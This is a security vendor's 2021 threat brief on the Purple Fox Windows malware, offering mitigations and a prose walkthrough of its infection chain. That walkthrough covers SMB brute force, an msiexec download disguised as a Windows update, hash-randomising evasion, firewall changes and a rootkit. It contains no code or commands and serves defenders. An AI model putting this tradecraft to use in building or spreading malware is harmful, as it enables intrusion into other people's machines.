Threat Brief – Purple Fox Malware

By: Tyler Horner
2021-March-29

Executive Summary
  • Purple Fox is an active malware campaign targeting Windows machines.
  • Up until recently, Purple Fox’s operators infected machines by using exploit kits and phishing emails.
  • Guardicore Labs have identified a new infection vector of this malware where internet-facing Windows machines are being breached through SMB password brute force.
  • Guardicore Labs have also identified Purple Fox’s vast network of compromised servers hosting its dropper and payloads. These servers appear to be compromised Microsoft IIS 7.5 servers.
  • The Purple Fox malware includes a rootkit which allows the threat actors to hide the malware on the machine and make it difficult to detect and remove.
Mitigation Strategies

The following mitigation strategies should be applied as part of a layered security model.  Legion Cyberworks helps our customers plan, prevent, and prepare for cyber-attacks.  Contact us if you want to get started improving your overall security posture.

  • Block inbound traffic on TCP Port 445 at the network edge
  • Enforce host-based firewalls on workstation endpoints to block inbound traffic on TCP Port 445, with exceptions only as needed
  • Run a top-tier EDR solution, such as Sophos Intercept X Advanced with EDR, on all workstation and server endpoints, and conduct regular threat hunts
  • Filter inbound emails for phishing, malware, and other threats
  • Conduct frequent security awareness training for your employees and test them to identify and remediate those who need more help spotting and defending against cyber-attacks like phishing
Cyber-Threat Intelligence

Purple Fox is previously known as a malware first discovered in 2018, that used to rely on exploit kits and phishing emails to spread. However, a new campaign has revealed a new propagation method leading to high infection numbers. Guardicore Labs said that Purple Fox is now being spread through “indiscriminate port scanning and exploitation of exposed SMB services with weak passwords and hashes.” The malware targets Windows machines and repurposes compromised systems to host malicious payloads. Infection chains may begin through internet-facing services containing vulnerabilities, browser exploits sent via phishing, brute-force attacks, or deployment via rootkits including RIG. The vast majority of their host servers are running older versions of Windows Server and Microsoft FTP.

The malware is spread by a few different manners. The first being that the worm payload is executed after a victims machine is compromised through a vulnerability. The second is the worm payload being sent via email through a phishing campaign. Once code execution is achieved on the victim’s machine, a new service will be created, with the purpose to establish persistence and to execute a simple cmd with a “for loop.” The purpose of this command would be to iterate through a number of URLs which contain the MSI that installs Purple Fox on the machine. “msiexec” will be executed with the “/i” flag, in order to download and install the malicious msi package from one of the hosts. The installer then pretends to be a Windows Update package along with Chinese text that translates to “windows update” and some random letters. The letters are randomly generated between each msi installer to create a different hash and make it difficult to tie between different versions of the same msi. This is a easy way of evading various detection methods such as static signatures. Guardicore was able to discover many different versions of the same msi and payloads.

Purple Fox is a great example of a cyber-threat that can be successfully prevented by maintaining a strong security posture, including multiple layers of detection and prevention, proper firewall ingress and egress filtering policies, and user education on social engineering attacks, said Clayton Dillard, President of Legion Cyberworks.

As the installer progresses, the installer will extract the payloads and decrypt them from within the msi package. The msi package contains three files:

  • A 64bit DLL payload (winupdate64)
  • A 32bit DLL payload (winupdate32)
  • An encrypted file containing a rootkit

The malware then modifies the windows firewall by executing multiple netsh commands. It adds a new policy named “Qianye” to the firewall and under this policy, creates a new filter called “Filter1.” Filter1 prohibits ports 445,139,135 on both TCP and UDP from any IP on the internet to connect to the infected machine. The last step before restarting the machine is to load the rootkit that’s hidden inside the encrypted payload in the msi package. This rootkit is based on the “hidden” open source rootkit project. The purpose of this rootkit is to hide the various registry keys, values, files, etc, as detailed by the git repository.

Once the rootkit is loaded, the installer will reboot the machine in order to rename the malware DLL into a system DLL file that will be executed on boot. With the machine restarted , the malware will be executed as well. After it’s execution, the malware will start its process: the malware will generate Ip ranges and start scanning them on port 445. As the machine responds to the SMB probe that’s being sent to port 445, it will try to authenticate to SMB by brute forcing usernames and passwords or by trying to establish a null session. If the authentication is successful, the malware will create a service whose name matches the regex AC0[0-9]{1} — e.g. AC01, AC02, AC05 (as mentioned before) that will download the MSI installation package from one of the many HTTP servers and thus will complete the infection loop.